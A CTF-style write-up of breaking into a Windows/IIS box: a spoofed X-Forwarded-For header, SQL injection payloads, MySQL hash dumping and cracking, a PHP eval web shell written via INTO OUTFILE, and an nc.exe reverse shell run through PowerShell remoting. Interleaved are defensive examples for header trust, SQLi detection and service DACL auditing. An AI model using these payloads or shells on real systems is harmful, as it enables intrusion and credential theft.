Port scan: only 80, 135 and 3306 are open.

PHP on IIS. The admin and login buttons both lead to admin.php. Requesting it returns "Access Denied: Header Missing. Please ensure you go through the proxy to access this page". After looking at the home page source, adding the request header X-Forwarded-For: 192.168.4.28 in the intercepting proxy got admin.php to load.

Clicking around with the proxy capturing, the find products feature turned out to be SQL injectable: entering 1' produced a MariaDB error (so MySQL syntax). Moving on to error-based injection:

```
productName=11'%20and%20updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e,@@datadir),1)#
```

This returned the database name warehouse, the user manager, and the data directory c:
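The access check above is defeated because X-Forwarded-For is a client-supplied header. The following is an added example (not code from this writeup or the box) showing the flawed check beside the form a backend should use: honour the header only when the TCP peer is a known proxy, and take the hop that proxy appended rather than whatever the client wrote. The proxy address 192.0.2.10 and the internal network 192.168.4.0/24 are assumed values.

```python
"""Deciding who the client is when X-Forwarded-For is in play.

Added example (not from the writeup). Assumed values: 192.0.2.10 is the
reverse proxy, 192.168.4.0/24 the internal network admin.php is meant for.
"""
import ipaddress

TRUSTED_PROXIES = {ipaddress.ip_address("192.0.2.10")}   # constructed
INTERNAL_NET = ipaddress.ip_network("192.168.4.0/24")     # constructed


def naive_is_internal(xff_header):
    """The check the page defeats: trusts the first X-Forwarded-For entry blindly."""
    if not xff_header:
        return False
    try:
        return ipaddress.ip_address(xff_header.split(",")[0].strip()) in INTERNAL_NET
    except ValueError:
        return False


def effective_client_ip(remote_addr, xff_header):
    """Return the address to authorise on.

    X-Forwarded-For is honoured only when the direct peer is a trusted proxy.
    Entries are read right to left, skipping trusted proxies; the first
    untrusted hop is the one the proxy appended, i.e. the real client.
    Anything the client put further left is ignored.
    """
    peer = ipaddress.ip_address(remote_addr)
    if peer not in TRUSTED_PROXIES or not xff_header:
        return peer
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: fall back to the peer address
        if addr not in TRUSTED_PROXIES:
            return addr
    return peer  # header listed only proxies; treat the proxy itself as the client


def hardened_is_internal(remote_addr, xff_header):
    """Access decision that a forged header cannot satisfy from outside."""
    return effective_client_ip(remote_addr, xff_header) in INTERNAL_NET
```

With a direct connection from an outside address, `hardened_is_internal` ignores the forged header entirely; the naive check passes on the header value alone, which is exactly what happened on this box.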
UNION queries also work, so there is no need for error-based injection, whose limited output length makes it less convenient.

Confirmed six columns, all of which are echoed. Read the MySQL users and password hashes directly:

```
productName=0'%20union%20select%20group_concat(User),group_concat(Password)%20,3,4,5,6%20from%20mysql.user--+
```
| User    | Password                                   |
|---------|--------------------------------------------|
| root    | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
| manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA |
| hector  | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D |
Crack them with john:

```
john --format=mysql-sha1 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```
Only hector's hash cracked: l33th4x0rhector. Connecting directly to 3306 with it did not work, though.

Try writing a shell into the IIS default web root:

```
productName=0'%20union%20select%201,'<?php%20eval($_POST[cmd]);?>',3,4,5,6%20into%20outfile'c:/inetpub/wwwroot/yjh.php'--+
```

The query returned an error, but requesting the file confirmed it had been written. AntSword connected successfully, and rummaging around turned up manager's password: manager : l3tm3!n
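Every step from the error-based probe to the INTO OUTFILE write passes through the same productName parameter, so this is where a filter or WAF gets its one look at the traffic. The following is an added example, not code from the writeup or the target: it percent-decodes (twice, to catch double encoding), strips comment padding, and matches the payload shapes used above. The sample requests are constructed; only their shape mirrors the writeup's payloads.

```python
"""Spotting the find-products injection at the request boundary.

Added example, not part of the writeup. Sample requests are constructed.
"""
import re
from urllib.parse import unquote_plus

SIGNATURES = {
    "error_based_xml":    re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "union_select":       re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "file_write":         re.compile(r"\binto\s+(out|dump)file\b"),
    "schema_probe":       re.compile(r"\b(mysql\.user|information_schema)\b"),
    "quote_then_logic":   re.compile(r"['\"]\s*(and|or)\s+[\w(]"),
    "comment_terminator": re.compile(r"(--|#)\s*$"),
}


def normalise(value):
    """Canonical form so one regex per signature is enough."""
    text = unquote_plus(unquote_plus(value))   # second pass catches %2527-style double encoding
    text = re.sub(r"/\*.*?\*/", " ", text)      # /**/ used as whitespace
    return re.sub(r"\s+", " ", text).strip().lower()


def inspect_param(value):
    """Names of the signatures that fire for one parameter value."""
    text = normalise(value)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def inspect_request(params):
    """Map of parameter -> signatures hit; empty when the request looks clean."""
    flagged = {}
    for key, value in params.items():
        hits = inspect_param(value)
        if hits:
            flagged[key] = hits
    return flagged


# Constructed sample traffic: four hostile values shaped like the writeup's, two benign.
SAMPLE_REQUESTS = {
    "error_based":  {"productName": "11'%20and%20updatexml(1,concat(0x7e,database(),0x7e,user()),1)#"},
    "union_dump":   {"productName": "0'%20union%20select%20group_concat(User),2,3,4,5,6%20from%20mysql.user--+"},
    "outfile":      {"productName": "0'%20union%20select%201,'x',3,4,5,6%20into%20outfile%20'c:/inetpub/wwwroot/test.php'--+"},
    "double_enc":   {"productName": "%2527%2520union%2520select%25201,2,3,4,5,6--+"},
    "benign_quote": {"productName": "O'Brien's widget", "page": "2"},
    "benign_and":   {"productName": "rod and reel 50% off"},
}


def flagged_requests():
    """Names of the sample requests that trip at least one signature."""
    return [name for name, params in SAMPLE_REQUESTS.items() if inspect_request(params)]


if __name__ == "__main__":
    for name, params in SAMPLE_REQUESTS.items():
        print(name, inspect_request(params))
```

The benign samples matter as much as the hostile ones: a lone apostrophe in O'Brien or the word "and" in a product name must not fire, which is why `quote_then_logic` requires the quote and the keyword together. Signature matching is a detection aid, not the fix; the query itself still needs to be parameterised, and the INTO OUTFILE write relies on the MySQL account holding FILE privilege with secure_file_priv unset.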
Fidelity
```powershell
# Run commands as hector through local PowerShell remoting
$user = "Fidelity\hector"
$pass = "l33th4x0rhector"
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
Invoke-Command -ScriptBlock { c:\temp\nc.exe -e cmd 10.10.14.14 1234 } -Credential $cred -Computer localhost
```

```powershell
# Try manager's recovered password against the administrator account
$user = "Fidelity\administrator"
$pass = "l3tm3!n"
$secstr = New-Object -TypeName System.Security.SecureString
$pass.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $user, $secstr
Invoke-Command -ScriptBlock { whoami } -Credential $cred -Computer localhost
```
Downloading and running winpeas.exe turned up the PowerShell command history. The same history can be read with:

```powershell
gc (Get-PSReadlineOption).HistorySavePath
```

```powershell
# DACL on the Services registry key
$acl = Get-ACL -Path HKLM:\SYSTEM\CurrentControlSet\Services
ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

# Find services whose SDDL grants Authenticated Users (AU) the start right (RP).
# sc sdshow needs the service name, not the full registry path, hence PSChildName.
$services = gci HKLM:\SYSTEM\CurrentControlSet\Services
foreach ($service in $services) { $sddl = (cmd /c sc sdshow $service.PSChildName)[1]; if ($sddl -match "RP[A-Z]*?;;;AU") { write-host $service.PSChildName,$sddl }}
```
The remaining steps errored out even when copied straight from the writeup, so I stopped here.
```powershell
Get-CimInstance win32_service | % {
    $result = $_ | Invoke-CimMethod -Name StartService
    [pscustomobject]@{
        Result=$result.ReturnValue
        Name=$_.Name
        Account=$_.StartName
        Startup=$_.StartMode
        DisplayName=$_.Displayname
    }
} | Sort Name | Where {
    ($_.Result -eq 0)`
    -and ($_.Account -eq "LocalSystem")`
    -and ($_.Startup -eq "Manual")
}
```
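Both the sc sdshow loop and the StartService pipeline above are after the same fact: which services running as LocalSystem can be started or reconfigured by an ordinary user. The following is an added example, not code from the writeup, that answers that offline by parsing SDDL strings rather than attempting to start every service on the host. Unlike the page's `RP[A-Z]*?;;;AU` match, it separates allow (A) from deny (D) ACEs and checks the change-config and write-DAC rights as well as start. The SDDL strings are constructed samples modelled on Windows defaults; only the one labelled VulnSvc deviates.

```python
"""Service DACL audit: who can start or reconfigure services that run as SYSTEM.

Added example, not part of the writeup. All SDDL strings below are constructed.
"""
import re

ACE_RX = re.compile(
    r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);"
    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]*)\)"
)
# SDDL SID aliases for principals every logged-on user belongs to
LOW_PRIV = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone", "IU": "Interactive"}
# Service-object rights in their two-letter SDDL form ("WD" here is the right WRITE_DAC,
# distinct from the SID alias WD above; the two never appear in the same ACE field)
RIGHT_NAMES = {"RP": "SERVICE_START", "DC": "SERVICE_CHANGE_CONFIG",
               "WD": "WRITE_DAC", "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
DANGEROUS = set(RIGHT_NAMES)


def parse_dacl(sddl):
    """Return (ace_type, set_of_right_codes, sid) for every ACE in the D: section."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for ace in ACE_RX.finditer(m.group(1)):
        rights = ace.group("rights")
        if rights.startswith("0x"):             # raw hex mask: kept as-is, not decoded here
            codes = {rights}
        else:
            codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        aces.append((ace.group("type"), codes, ace.group("sid")))
    return aces


def risky_grants(sddl):
    """Allow-ACEs that hand a low-privilege principal a dangerous right."""
    found = []
    for ace_type, codes, sid in parse_dacl(sddl):
        if ace_type != "A" or sid not in LOW_PRIV:
            continue
        bad = sorted(codes & DANGEROUS)
        if bad:
            found.append((LOW_PRIV[sid], [RIGHT_NAMES[c] for c in bad]))
    return found


def audit(services):
    """services: name -> (account, start mode, sddl).
    Same filter as the page's pipeline: only services running as LocalSystem are reported."""
    findings = []
    for name, (account, start, sddl) in services.items():
        grants = risky_grants(sddl)
        if grants and account == "LocalSystem":
            findings.append({"service": name, "start": start, "grants": grants})
    return findings


# Constructed samples. DEFAULT_SDDL follows the usual Windows service DACL shape.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
VULN_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWRPLOCRRC;;;AU)")                      # AU may start the service
DENY_SDDL = "D:(D;;RP;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)"   # explicit deny: not a finding

SAMPLE_SERVICES = {   # constructed
    "SampleSvc": ("LocalSystem", "Auto", DEFAULT_SDDL),
    "VulnSvc":   ("LocalSystem", "Manual", VULN_SDDL),
    "NetSvc":    ("NT AUTHORITY\\NetworkService", "Manual", VULN_SDDL),  # filtered: not SYSTEM
    "DenySvc":   ("LocalSystem", "Manual", DENY_SDDL),
}

if __name__ == "__main__":
    for finding in audit(SAMPLE_SERVICES):
        print(finding)
```

On a live host the SDDL strings would come from `sc sdshow <name>` for each service, fed in as the third tuple element; parsing the output rather than calling StartService keeps the check read-only, which also makes it usable as a scheduled configuration audit rather than a one-off probe.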